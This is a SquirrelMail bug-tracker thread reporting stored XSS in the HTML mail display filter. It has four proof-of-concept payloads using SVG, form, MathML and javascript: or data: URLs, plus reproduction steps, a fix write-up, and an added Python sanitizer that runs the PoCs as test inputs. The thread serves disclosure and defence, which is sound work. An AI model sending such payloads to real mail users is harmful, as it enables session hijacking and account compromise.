There are multiple XSS vulnerabilities in the mail message display page (functions/mime.php): the function magicHTML cannot filter some special tags.
The steps to reproduce are below:
PoC1 (triggered in Chrome, Firefox):
<svg><a xlink:href="javascript:alert(/XSS/)"><rect width="1000" height="1000" fill="white"/></a></svg>
PoC2 (triggered in Chrome, Firefox, Safari):
<form action='data:text/html,<script>alert(/XSS/)</script>'><button></form>
PoC3 (triggered in Firefox):
<math><maction actiontype="" xlink:href="javascript:alert(/XSS/)"> Click here
PoC4 (triggered in Firefox):
<math xlink:href=javascript:alert(/XSS/)> Click here
Choose one of the PoCs and send it to the SquirrelMail webmail system.
Log in to the SquirrelMail webmail system and view the received mail (the HTML version is opened).
Click the area in the content. The XSS will be triggered.
Version:
The tested SquirrelMail webmail version is 1.4.23. The link is below:
http://squirrelmail.org/download.php
PHP: 5.3.17
Apache: 2.2.12
I created a patch that fixes all those issues and a few more.
Apart from the ones you mentioned, it is also possible to achieve XSS via the formaction attribute or via SVG animations (animate "to" attribute).
I'm now adding a lot more filtering, but I believe this doesn't break any common HTML mails, as other webmailers apply similar filtering. I'm completely removing inline SVG (Gmail does the same, so I don't think anyone uses it). Some of the filtering is now redundant, but it may help kill further variations.
Particularly:
- Completely remove inline svg and content
- Remove animate, form, math, param tags
- URL-filter xlink:href, action, formaction, to
This is all far from ideal, but it fixes everything I can think of. Better would be a whitelist approach or using a library like htmlpurifier.
For proper credits: Sebastian Lekies was incredibly helpful in teaching me about all kinds of XSS vectors I wasn't aware of.
Last edit: Hanno Böck 2018-07-17
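The filtering approach described in the reply above (remove inline SVG and its content, remove form/animate/math/param, URL-filter xlink:href, action, formaction and to), written out as an added example in Python. It is not SquirrelMail's magicHTML and not the code of the linked patches, just an illustration of the same rules applied to the reporter's four PoCs and the two extra vectors (formaction, animate "to"). Assumptions that are not in the thread: MathML is dropped with its content like SVG, script/style are dropped, on* event-handler attributes are dropped, and the allowed URL schemes are http, https and mailto.

```python
"""Tag removal plus URL-attribute scheme filtering for HTML mail (added example).

Illustrates the rules from the reply above with Python's stdlib parser; it is
not SquirrelMail's magicHTML.  Assumed (not stated in the thread): MathML and
script/style are dropped like SVG, on* attributes are dropped, and only the
http/https/mailto schemes are allowed in URL attributes.
"""
import re
from html import escape
from html.parser import HTMLParser

# Element and everything inside it removed ("inline svg and content";
# math/script/style added here by assumption).
DROP_SUBTREE = {"svg", "math", "script", "style"}
# Tag removed, content kept (form/animate/param from the reply).
DROP_TAG = {"form", "animate", "param"}
# Attributes that can carry a URL and get scheme-checked.
URL_ATTRS = {"href", "src", "action", "formaction", "to", "xlink:href", "background"}
SAFE_SCHEMES = {"http", "https", "mailto"}  # assumption, see module docstring

# Browsers ignore tabs, newlines and other C0 controls inside a scheme, so
# "java\tscript:" must be squashed before the scheme is compared.
_CTRL_WS = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")


def url_is_safe(value):
    """True for relative URLs and for absolute URLs whose scheme is allowed."""
    squashed = _CTRL_WS.sub("", value).lower()
    m = _SCHEME.match(squashed)
    if m is None:
        return True  # no scheme: relative URL, e.g. "/img/logo.png"
    return m.group(1) in SAFE_SCHEMES


class MailHTMLFilter(HTMLParser):
    """Re-serialises the input, dropping tags/attributes per the rules above."""

    def __init__(self):
        super().__init__(convert_charrefs=True)  # entities decoded before checks
        self.out = []
        self._skip_tag = None   # tag whose subtree is currently being dropped
        self._skip_depth = 0    # nesting of that tag, to find its matching close

    def handle_starttag(self, tag, attrs):
        if self._skip_tag:
            if tag == self._skip_tag:
                self._skip_depth += 1
            return
        if tag in DROP_SUBTREE:
            self._skip_tag, self._skip_depth = tag, 1
            return
        if tag in DROP_TAG:
            return
        parts = [tag]
        for name, value in attrs:           # names are already lowercased
            if name.startswith("on"):       # event handlers (assumption)
                continue
            if name in URL_ATTRS and not url_is_safe(value or ""):
                continue
            parts.append(name if value is None
                         else '%s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s>" % " ".join(parts))

    def handle_startendtag(self, tag, attrs):
        # <tag .../> nests nothing, so it must never enter subtree-skip mode.
        if self._skip_tag or tag in DROP_SUBTREE or tag in DROP_TAG:
            return
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if self._skip_tag:
            if tag == self._skip_tag:
                self._skip_depth -= 1
                if self._skip_depth == 0:
                    self._skip_tag = None
            return
        if tag in DROP_SUBTREE or tag in DROP_TAG:
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip_tag:
            self.out.append(escape(data, quote=False))


def sanitize(html):
    """Run one HTML body through a fresh filter and return the cleaned markup."""
    p = MailHTMLFilter()
    p.feed(html)
    p.close()
    return "".join(p.out)


if __name__ == "__main__":
    # Constructed inputs: the reporter's PoCs plus the two vectors from the reply.
    vectors = [
        '<svg><a xlink:href="javascript:alert(/XSS/)"><rect width="1000" height="1000" fill="white"/></a></svg>',
        "<form action='data:text/html,<script>alert(/XSS/)</script>'><button></form>",
        '<math><maction actiontype="" xlink:href="javascript:alert(/XSS/)"> Click here',
        '<math xlink:href=javascript:alert(/XSS/)> Click here',
        '<button formaction="javascript:alert(1)">x</button>',
        '<svg><animate xlink:href="#x" attributeName="href" to="javascript:alert(1)"/></svg>',
        '<a href="&#106;avascript:alert(1)">entity-encoded</a>',
    ]
    for v in vectors:
        print("%-90s -> %r" % (v[:90], sanitize(v)))
```

Note that an unclosed `<svg>` or `<math>` drops the remainder of the message, which is the price of the "remove content" rule; the filter is deliberately lossy rather than clever. The scheme check runs on the entity-decoded, control-stripped, lowercased value, since `&#106;avascript:`, `java&#9;script:` and `JavaScript:` all reach the browser as `javascript:`.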
Thank you for this report. However, this bug tracker is not the place for disclosure of security vulnerabilities. Please refer to https://squirrelmail.org/security for information on how to report such issues directly to the SquirrelMail team so that we can analyze it and patch it with you before releasing it responsibly to the community.
The following patches should close all issues you've found:
1.4.23:
https://sourceforge.net/p/squirrelmail/code/14804
https://sourceforge.net/p/squirrelmail/code/14806
1.5.2:
https://sourceforge.net/p/squirrelmail/code/14805
https://sourceforge.net/p/squirrelmail/code/14807